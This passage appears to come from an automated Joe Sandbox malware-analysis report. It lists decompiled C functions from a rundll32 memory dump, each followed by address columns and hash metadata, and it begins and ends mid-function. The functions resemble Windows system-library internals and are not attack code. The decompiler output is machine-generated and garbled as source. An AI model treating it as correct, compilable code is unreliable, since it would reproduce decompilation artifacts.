                                                                                                                											L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                                										}
                                                                                                                										asm("lock xadd [esi], ebx");
                                                                                                                										__eflags = _t89 == 1;
                                                                                                                										if(_t89 == 1) {
                                                                                                                											_t41 = _t104 + 4; // 0x0
                                                                                                                											_push( *_t41);
                                                                                                                											E044495D0();
                                                                                                                											L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                                										}
                                                                                                                										_t49 = _t102;
                                                                                                                										L4:
                                                                                                                										return _t49;
                                                                                                                									}
                                                                                                                									E0441EB70(_t93, 0x44f79a0);
                                                                                                                									asm("lock xadd [esi], eax");
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t25 = _t104 + 4; // 0x0
                                                                                                                										_push( *_t25);
                                                                                                                										E044495D0();
                                                                                                                										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                                                										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                                                									}
                                                                                                                									 *_t102 = 1;
                                                                                                                									asm("lock xadd [edi], eax");
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t28 = _t102 + 4; // 0xffffffff
                                                                                                                										_push( *_t28);
                                                                                                                										E044495D0();
                                                                                                                										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                                                                									}
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								_t15 = _t104 + 0x10; // 0x2000352b
                                                                                                                								_t93 =  &_v20;
                                                                                                                								_t17 = _t104 + 0xe; // 0x352bd002
                                                                                                                								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
                                                                                                                								_t85 = 6;
                                                                                                                								_v20 = _t85;
                                                                                                                								_t87 = E0443F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
                                                                                                                								__eflags = _t87;
                                                                                                                								if(_t87 < 0) {
                                                                                                                									goto L3;
                                                                                                                								}
                                                                                                                								 *((char*)(_t108 + 0xe)) = 1;
                                                                                                                								goto L15;
                                                                                                                							}
                                                                                                                							__eflags = _t53 - 0xc000026e;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								goto L3;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                                                                						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                                                                							goto L3;
                                                                                                                						} else {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L3:
                                                                                                                					_t49 = _t104;
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				_t49 = 0;
                                                                                                                				goto L4;
                                                                                                                			}


























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7f27577a7392b0f81c28792dedc5f6c1c965e36a15e832c92c3ab283dcfa2837
                                                                                                                • Instruction ID: 27fe9668445b4173c569e61afb9e032b4994ad3377660a8f964a002b6af9bd84
                                                                                                                • Opcode Fuzzy Hash: 7f27577a7392b0f81c28792dedc5f6c1c965e36a15e832c92c3ab283dcfa2837
                                                                                                                • Instruction Fuzzy Hash: 1151EF71204742ABEB20DF69C840B27BBE4FF84714F24492FE59687691E774F854CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04432AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                                                                                				signed short* _v8;
                                                                                                                				signed short* _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr* _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				short _t56;
                                                                                                                				signed int _t57;
                                                                                                                				intOrPtr _t58;
                                                                                                                				signed short* _t61;
                                                                                                                				intOrPtr _t72;
                                                                                                                				intOrPtr _t75;
                                                                                                                				intOrPtr _t84;
                                                                                                                				intOrPtr _t87;
                                                                                                                				intOrPtr* _t90;
                                                                                                                				signed short* _t91;
                                                                                                                				signed int _t95;
                                                                                                                				signed short* _t96;
                                                                                                                				intOrPtr _t97;
                                                                                                                				intOrPtr _t102;
                                                                                                                				signed int _t108;
                                                                                                                				intOrPtr _t110;
                                                                                                                				signed int _t111;
                                                                                                                				signed short* _t112;
                                                                                                                				void* _t113;
                                                                                                                				signed int _t116;
                                                                                                                				signed short** _t119;
                                                                                                                				short* _t120;
                                                                                                                				signed int _t123;
                                                                                                                				signed int _t124;
                                                                                                                				void* _t125;
                                                                                                                				intOrPtr _t127;
                                                                                                                				signed int _t128;
                                                                                                                
                                                                                                                				_t90 = __ecx;
                                                                                                                				_v16 = __edx;
                                                                                                                				_t108 = _a4;
                                                                                                                				_v28 = __ecx;
                                                                                                                				_t4 = _t108 - 1; // -1
                                                                                                                				if(_t4 > 0x13) {
                                                                                                                					L15:
                                                                                                                					_t56 = 0xc0000100;
                                                                                                                					L16:
                                                                                                                					return _t56;
                                                                                                                				}
                                                                                                                				_t57 = _t108 * 0x1c;
                                                                                                                				_v32 = _t57;
                                                                                                                				_t6 = _t57 + 0x44f8204; // 0x0
                                                                                                                				_t123 =  *_t6;
                                                                                                                				_t7 = _t57 + 0x44f8208; // 0x44f8207
                                                                                                                				_t8 = _t57 + 0x44f8208; // 0x44f8207
                                                                                                                				_t119 = _t8;
                                                                                                                				_v36 = _t123;
                                                                                                                				_t110 = _t7 + _t123 * 8;
                                                                                                                				_v24 = _t110;
                                                                                                                				_t111 = _a4;
                                                                                                                				if(_t119 >= _t110) {
                                                                                                                					L12:
                                                                                                                					if(_t123 != 3) {
                                                                                                                						_t58 =  *0x44f8450; // 0x35173a
                                                                                                                						if(_t58 == 0) {
                                                                                                                							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t26 = _t57 + 0x44f821c; // 0x0
                                                                                                                						_t58 =  *_t26;
                                                                                                                					}
                                                                                                                					 *_t90 = _t58;
                                                                                                                					goto L15;
                                                                                                                				} else {
                                                                                                                					goto L2;
                                                                                                                				}
                                                                                                                				while(1) {
                                                                                                                					_t116 =  *_t61 & 0x0000ffff;
                                                                                                                					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                                                					if(_t116 == _t128) {
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                					L5:
                                                                                                                					if(_t116 >= 0x61) {
                                                                                                                						if(_t116 > 0x7a) {
                                                                                                                							_t97 =  *0x44f6d5c; // 0x7f870654
                                                                                                                							_t72 =  *0x44f6d5c; // 0x7f870654
                                                                                                                							_t75 =  *0x44f6d5c; // 0x7f870654
                                                                                                                							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                                                                                						} else {
                                                                                                                							_t116 = _t116 - 0x20;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_t128 >= 0x61) {
                                                                                                                						if(_t128 > 0x7a) {
                                                                                                                							_t102 =  *0x44f6d5c; // 0x7f870654
                                                                                                                							_t84 =  *0x44f6d5c; // 0x7f870654
                                                                                                                							_t87 =  *0x44f6d5c; // 0x7f870654
                                                                                                                							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                                                                                						} else {
                                                                                                                							_t128 = _t128 - 0x20;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_t116 == _t128) {
                                                                                                                						_t61 = _v12;
                                                                                                                						_t96 = _v8;
                                                                                                                					} else {
                                                                                                                						_t113 = _t116 - _t128;
                                                                                                                						L9:
                                                                                                                						_t111 = _a4;
                                                                                                                						if(_t113 == 0) {
                                                                                                                							_t115 =  &(( *_t119)[_t111 + 1]);
                                                                                                                							_t33 =  &(_t119[1]); // 0x100
                                                                                                                							_t120 = _a8;
                                                                                                                							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                                                                                							_t35 = _t95 - 1; // 0xff
                                                                                                                							_t124 = _t35;
                                                                                                                							if(_t120 == 0) {
                                                                                                                								L27:
                                                                                                                								 *_a16 = _t95;
                                                                                                                								_t56 = 0xc0000023;
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							if(_t124 >= _a12) {
                                                                                                                								if(_a12 >= 1) {
                                                                                                                									 *_t120 = 0;
                                                                                                                								}
                                                                                                                								goto L27;
                                                                                                                							}
                                                                                                                							 *_a16 = _t124;
                                                                                                                							_t125 = _t124 + _t124;
                                                                                                                							E0444F3E0(_t120, _t115, _t125);
                                                                                                                							_t56 = 0;
                                                                                                                							 *((short*)(_t125 + _t120)) = 0;
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						_t119 =  &(_t119[2]);
                                                                                                                						if(_t119 < _v24) {
                                                                                                                							L2:
                                                                                                                							_t91 =  *_t119;
                                                                                                                							_t61 = _t91;
                                                                                                                							_v12 = _t61;
                                                                                                                							_t112 =  &(_t61[_t111]);
                                                                                                                							_v8 = _t112;
                                                                                                                							if(_t61 >= _t112) {
                                                                                                                								break;
                                                                                                                							} else {
                                                                                                                								_t127 = _v16 - _t91;
                                                                                                                								_t96 = _t112;
                                                                                                                								_v20 = _t127;
                                                                                                                								_t116 =  *_t61 & 0x0000ffff;
                                                                                                                								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                                                								if(_t116 == _t128) {
                                                                                                                									goto L18;
                                                                                                                								}
                                                                                                                								goto L5;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t90 = _v28;
                                                                                                                							_t57 = _v32;
                                                                                                                							_t123 = _v36;
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L18:
                                                                                                                					_t61 =  &(_t61[1]);
                                                                                                                					_v12 = _t61;
                                                                                                                					if(_t61 >= _t96) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					_t127 = _v20;
                                                                                                                				}
                                                                                                                				_t113 = 0;
                                                                                                                				goto L9;
                                                                                                                			}

                                                                                                                0x04475d93
                                                                                                                0x04432c35
                                                                                                                0x04432c35
                                                                                                                0x04432c35
                                                                                                                0x04432c2f
                                                                                                                0x04432b65
                                                                                                                0x04432b9f
                                                                                                                0x04432ba2
                                                                                                                0x04432b67
                                                                                                                0x04432b67
                                                                                                                0x04432b69
                                                                                                                0x04432b6b
                                                                                                                0x04432b6e
                                                                                                                0x04432bc9
                                                                                                                0x04432bcc
                                                                                                                0x04432bcf
                                                                                                                0x04432bd4
                                                                                                                0x04432bd6
                                                                                                                0x04432bd6
                                                                                                                0x04432bdb
                                                                                                                0x04432c02
                                                                                                                0x04432c05
                                                                                                                0x04432c07
                                                                                                                0x00000000
                                                                                                                0x04432c07
                                                                                                                0x04432be0
                                                                                                                0x04432c00
                                                                                                                0x04432c3f
                                                                                                                0x04432c3f
                                                                                                                0x00000000
                                                                                                                0x04432c00
                                                                                                                0x04432be5
                                                                                                                0x04432be7
                                                                                                                0x04432bec
                                                                                                                0x04432bf4
                                                                                                                0x04432bf6
                                                                                                                0x00000000
                                                                                                                0x04432bf6
                                                                                                                0x04432b70
                                                                                                                0x04432b76
                                                                                                                0x04432b2b
                                                                                                                0x04432b2b
                                                                                                                0x04432b2d
                                                                                                                0x04432b2f
                                                                                                                0x04432b32
                                                                                                                0x04432b35
                                                                                                                0x04432b3a
                                                                                                                0x00000000
                                                                                                                0x04432b40
                                                                                                                0x04432b43
                                                                                                                0x04432b45
                                                                                                                0x04432b47
                                                                                                                0x04432b4a
                                                                                                                0x04432b4d
                                                                                                                0x04432b53
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432b53
                                                                                                                0x04432b78
                                                                                                                0x04432b78
                                                                                                                0x04432b7b
                                                                                                                0x04432b7e
                                                                                                                0x00000000
                                                                                                                0x04432b7e
                                                                                                                0x04432b76
                                                                                                                0x04432ba5
                                                                                                                0x04432ba5
                                                                                                                0x04432ba8
                                                                                                                0x04432bad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432baf
                                                                                                                0x04432baf
                                                                                                                0x04432bc2
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8b9fcdccccb112c41a86a64e042a65043dfaccd8b4fbf0072fdcfd7ac7cbab4e
                                                                                                                • Instruction ID: d5807b1fbaf219d79514d704e194d88e1550febd27e04e9ad4ea32417570b656
                                                                                                                • Opcode Fuzzy Hash: 8b9fcdccccb112c41a86a64e042a65043dfaccd8b4fbf0072fdcfd7ac7cbab4e
                                                                                                                • Instruction Fuzzy Hash: 13519F76B001258BCF24DF1CC8949BEB7B1FB88B01716849BE8569B310E774BE52DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E044CAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed short* _t36;
                                                                                                                				signed int _t41;
                                                                                                                				char* _t42;
                                                                                                                				intOrPtr _t43;
                                                                                                                				signed int _t47;
                                                                                                                				void* _t52;
                                                                                                                				signed int _t57;
                                                                                                                				intOrPtr _t61;
                                                                                                                				signed char _t62;
                                                                                                                				signed int _t72;
                                                                                                                				signed char _t85;
                                                                                                                				signed int _t88;
                                                                                                                
                                                                                                                				_t73 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_t85 = __ecx;
                                                                                                                				_v8 = __edx;
                                                                                                                				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                                                                                                				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                                                                                                				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                                                                                                					_t57 = _t57 | 0x00000001;
                                                                                                                				}
                                                                                                                				_t88 = 0;
                                                                                                                				_t36 = 0;
                                                                                                                				_t96 = _a12;
                                                                                                                				if(_a12 == 0) {
                                                                                                                					_t62 = _a8;
                                                                                                                					__eflags = _t62;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					_t52 = E044CC38B(_t85, _t73, _t57, 0);
                                                                                                                					_t62 = _a8;
                                                                                                                					 *_t62 = _t52;
                                                                                                                					_t36 = 0;
                                                                                                                					goto L11;
                                                                                                                				} else {
                                                                                                                					_t36 = E044CACFD(_t85, _t73, _t96, _t57, _a8);
                                                                                                                					if(0 == 0 || 0 == 0xffffffff) {
                                                                                                                						_t72 = _t88;
                                                                                                                					} else {
                                                                                                                						_t72 =  *0x00000000 & 0x0000ffff;
                                                                                                                					}
                                                                                                                					 *_a12 = _t72;
                                                                                                                					_t62 = _a8;
                                                                                                                					L11:
                                                                                                                					_t73 = _v8;
                                                                                                                					L12:
                                                                                                                					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                                                                                                						L19:
                                                                                                                						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                                                                                                							L22:
                                                                                                                							_t74 = _v8;
                                                                                                                							__eflags = _v8;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								L25:
                                                                                                                								__eflags = _t88 - 2;
                                                                                                                								if(_t88 != 2) {
                                                                                                                									__eflags = _t85 + 0x44 + (_t88 << 6);
                                                                                                                									_t88 = E044CFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                                                                                                									goto L34;
                                                                                                                								}
                                                                                                                								L26:
                                                                                                                								_t59 = _v8;
                                                                                                                								E044CEA55(_t85, _v8, _t57);
                                                                                                                								asm("sbb esi, esi");
                                                                                                                								_t88 =  ~_t88;
                                                                                                                								_t41 = E04427D50();
                                                                                                                								__eflags = _t41;
                                                                                                                								if(_t41 == 0) {
                                                                                                                									_t42 = 0x7ffe0380;
                                                                                                                								} else {
                                                                                                                									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                								}
                                                                                                                								__eflags =  *_t42;
                                                                                                                								if( *_t42 != 0) {
                                                                                                                									_t43 =  *[fs:0x30];
                                                                                                                									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                                                                                                									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                                                                                                										__eflags = _t88;
                                                                                                                										if(_t88 != 0) {
                                                                                                                											E044C1608(_t85, _t59, 3);
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L34;
                                                                                                                							}
                                                                                                                							_push(_t62);
                                                                                                                							_t47 = E044D1536(0x44f8ae4, (_t74 -  *0x44f8b04 >> 0x14) + (_t74 -  *0x44f8b04 >> 0x14), _t88, __eflags);
                                                                                                                							__eflags = _t47;
                                                                                                                							if(_t47 == 0) {
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							_t74 = _v12;
                                                                                                                							_t27 = _t47 - 1; // -1
                                                                                                                							_t88 = _t27;
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                						_t62 = _t85;
                                                                                                                						if(L044CC323(_t62, _v8, _t57) != 0xffffffff) {
                                                                                                                							goto L22;
                                                                                                                						}
                                                                                                                						_push(_t62);
                                                                                                                						_push(_t88);
                                                                                                                						E044CA80D(_t85, 9, _v8, _t88);
                                                                                                                						goto L34;
                                                                                                                					} else {
                                                                                                                						_t101 = _t36;
                                                                                                                						if(_t36 != 0) {
                                                                                                                							L16:
                                                                                                                							if(_t36 == 0xffffffff) {
                                                                                                                								goto L19;
                                                                                                                							}
                                                                                                                							_t62 =  *((intOrPtr*)(_t36 + 2));
                                                                                                                							if((_t62 & 0x0000000f) == 0) {
                                                                                                                								goto L19;
                                                                                                                							}
                                                                                                                							_t62 = _t62 & 0xf;
                                                                                                                							if(E044ACB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                                                                                                								L34:
                                                                                                                								return _t88;
                                                                                                                							}
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						_t62 = _t85;
                                                                                                                						_t36 = E044CACFD(_t62, _t73, _t101, _t57, _t62);
                                                                                                                						if(_t36 == 0) {
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 22d3df6384efd394b6ec56b99e15719ed4567edb2ff343d9b74c1bc9019f01f7
                                                                                                                • Instruction ID: 5c9a79cd344d8ce00696168bb53ddb1bfe3f423174885c47f4e17a92dfc6208d
                                                                                                                • Opcode Fuzzy Hash: 22d3df6384efd394b6ec56b99e15719ed4567edb2ff343d9b74c1bc9019f01f7
                                                                                                                • Instruction Fuzzy Hash: 1841D2797002199BEF65DB26C894B7BB399AF84714F0C421FF816A7391DB74F801C6A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E0442DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				char _v5;
                                                                                                                				signed int _v12;
                                                                                                                				signed int* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				intOrPtr _v44;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t54;
                                                                                                                				char* _t58;
                                                                                                                				signed int _t66;
                                                                                                                				intOrPtr _t67;
                                                                                                                				intOrPtr _t68;
                                                                                                                				intOrPtr _t72;
                                                                                                                				intOrPtr _t73;
                                                                                                                				signed int* _t75;
                                                                                                                				intOrPtr _t79;
                                                                                                                				intOrPtr _t80;
                                                                                                                				char _t82;
                                                                                                                				signed int _t83;
                                                                                                                				signed int _t84;
                                                                                                                				signed int _t88;
                                                                                                                				signed int _t89;
                                                                                                                				intOrPtr _t90;
                                                                                                                				intOrPtr _t92;
                                                                                                                				signed int _t97;
                                                                                                                				intOrPtr _t98;
                                                                                                                				intOrPtr* _t99;
                                                                                                                				signed int* _t101;
                                                                                                                				signed int* _t102;
                                                                                                                				intOrPtr* _t103;
                                                                                                                				intOrPtr _t105;
                                                                                                                				signed int _t106;
                                                                                                                				void* _t118;
                                                                                                                
                                                                                                                				_t92 = __edx;
                                                                                                                				_t75 = _a4;
                                                                                                                				_t98 = __ecx;
                                                                                                                				_v44 = __edx;
                                                                                                                				_t106 = _t75[1];
                                                                                                                				_v40 = __ecx;
                                                                                                                				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                                                                                					_t82 = 0;
                                                                                                                				} else {
                                                                                                                					_t82 = 1;
                                                                                                                				}
                                                                                                                				_v5 = _t82;
                                                                                                                				_t6 = _t98 + 0xc8; // 0xc9
                                                                                                                				_t101 = _t6;
                                                                                                                				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                                                                                				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                                                                                				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                                                                                				if(_t82 != 0) {
                                                                                                                					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                                                                                					_t83 =  *_t75;
                                                                                                                					_t54 = _t75[1];
                                                                                                                					 *_t101 = _t83;
                                                                                                                					_t84 = _t83 | _t54;
                                                                                                                					_t101[1] = _t54;
                                                                                                                					if(_t84 == 0) {
                                                                                                                						_t101[1] = _t101[1] & _t84;
                                                                                                                						 *_t101 = 1;
                                                                                                                					}
                                                                                                                					goto L19;
                                                                                                                				} else {
                                                                                                                					if(_t101 == 0) {
                                                                                                                						E0440CC50(E04404510(0xc000000d));
                                                                                                                						_t88 =  *_t101;
                                                                                                                						_t97 = _t101[1];
                                                                                                                						L15:
                                                                                                                						_v12 = _t88;
                                                                                                                						_t66 = _t88 -  *_t75;
                                                                                                                						_t89 = _t97;
                                                                                                                						asm("sbb ecx, [ebx+0x4]");
                                                                                                                						_t118 = _t89 - _t97;
                                                                                                                						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                                                                                							_t66 = _t66 | 0xffffffff;
                                                                                                                							_t89 = 0x7fffffff;
                                                                                                                						}
                                                                                                                						 *_t101 = _t66;
                                                                                                                						_t101[1] = _t89;
                                                                                                                						L19:
                                                                                                                						if(E04427D50() != 0) {
                                                                                                                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                						} else {
                                                                                                                							_t58 = 0x7ffe0386;
                                                                                                                						}
                                                                                                                						_t102 = _v16;
                                                                                                                						if( *_t58 != 0) {
                                                                                                                							_t58 = E044D8ED6(_t102, _t98);
                                                                                                                						}
                                                                                                                						_t76 = _v44;
                                                                                                                						E04422280(_t58, _v44);
                                                                                                                						E0442DD82(_v44, _t102, _t98);
                                                                                                                						E0442B944(_t102, _v5);
                                                                                                                						return E0441FFB0(_t76, _t98, _t76);
                                                                                                                					}
                                                                                                                					_t99 = 0x7ffe03b0;
                                                                                                                					do {
                                                                                                                						_t103 = 0x7ffe0010;
                                                                                                                						do {
                                                                                                                							_t67 =  *0x44f8628; // 0x0
                                                                                                                							_v28 = _t67;
                                                                                                                							_t68 =  *0x44f862c; // 0x0
                                                                                                                							_v32 = _t68;
                                                                                                                							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                                                                                							_v20 =  *_t99;
                                                                                                                							while(1) {
                                                                                                                								_t97 =  *0x7ffe000c;
                                                                                                                								_t90 =  *0x7FFE0008;
                                                                                                                								if(_t97 ==  *_t103) {
                                                                                                                									goto L10;
                                                                                                                								}
                                                                                                                								asm("pause");
                                                                                                                							}
                                                                                                                							L10:
                                                                                                                							_t79 = _v24;
                                                                                                                							_t99 = 0x7ffe03b0;
                                                                                                                							_v12 =  *0x7ffe03b0;
                                                                                                                							_t72 =  *0x7FFE03B4;
                                                                                                                							_t103 = 0x7ffe0010;
                                                                                                                							_v36 = _t72;
                                                                                                                						} while (_v20 != _v12 || _t79 != _t72);
                                                                                                                						_t73 =  *0x44f8628; // 0x0
                                                                                                                						_t105 = _v28;
                                                                                                                						_t80 =  *0x44f862c; // 0x0
                                                                                                                					} while (_t105 != _t73 || _v32 != _t80);
                                                                                                                					_t98 = _v40;
                                                                                                                					asm("sbb edx, [ebp-0x20]");
                                                                                                                					_t88 = _t90 - _v12 - _t105;
                                                                                                                					_t75 = _a4;
                                                                                                                					asm("sbb edx, eax");
                                                                                                                					_t31 = _t98 + 0xc8; // 0x44cfb53
                                                                                                                					_t101 = _t31;
                                                                                                                					 *_t101 = _t88;
                                                                                                                					_t101[1] = _t97;
                                                                                                                					goto L15;
                                                                                                                				}
                                                                                                                			}










































                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43a93e919e7d60021772518e435b9c2af78bc01ad7deab3c8b5c1dcb66b4a723
                                                                                                                • Instruction ID: 35eddd132b2dd7c81c6440c1708e9617c5331a00536877dc9b6a8c9b260c8cf8
                                                                                                                • Opcode Fuzzy Hash: 43a93e919e7d60021772518e435b9c2af78bc01ad7deab3c8b5c1dcb66b4a723
                                                                                                                • Instruction Fuzzy Hash: 925199B1E00625CBDF14DF69C680AAEBBF1FB48350F20856AD955AB340EB70B945CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E0441EF40(intOrPtr __ecx) {
                                                                                                                				char _v5;
                                                                                                                				char _v6;
                                                                                                                				char _v7;
                                                                                                                				char _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t58;
                                                                                                                				char _t59;
                                                                                                                				signed char _t69;
                                                                                                                				void* _t73;
                                                                                                                				signed int _t74;
                                                                                                                				char _t79;
                                                                                                                				signed char _t81;
                                                                                                                				signed int _t85;
                                                                                                                				signed int _t87;
                                                                                                                				intOrPtr _t90;
                                                                                                                				signed char* _t91;
                                                                                                                				void* _t92;
                                                                                                                				signed int _t94;
                                                                                                                				void* _t96;
                                                                                                                
                                                                                                                				_t90 = __ecx;
                                                                                                                				_v16 = __ecx;
                                                                                                                				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                                                                                					_t58 =  *((intOrPtr*)(__ecx));
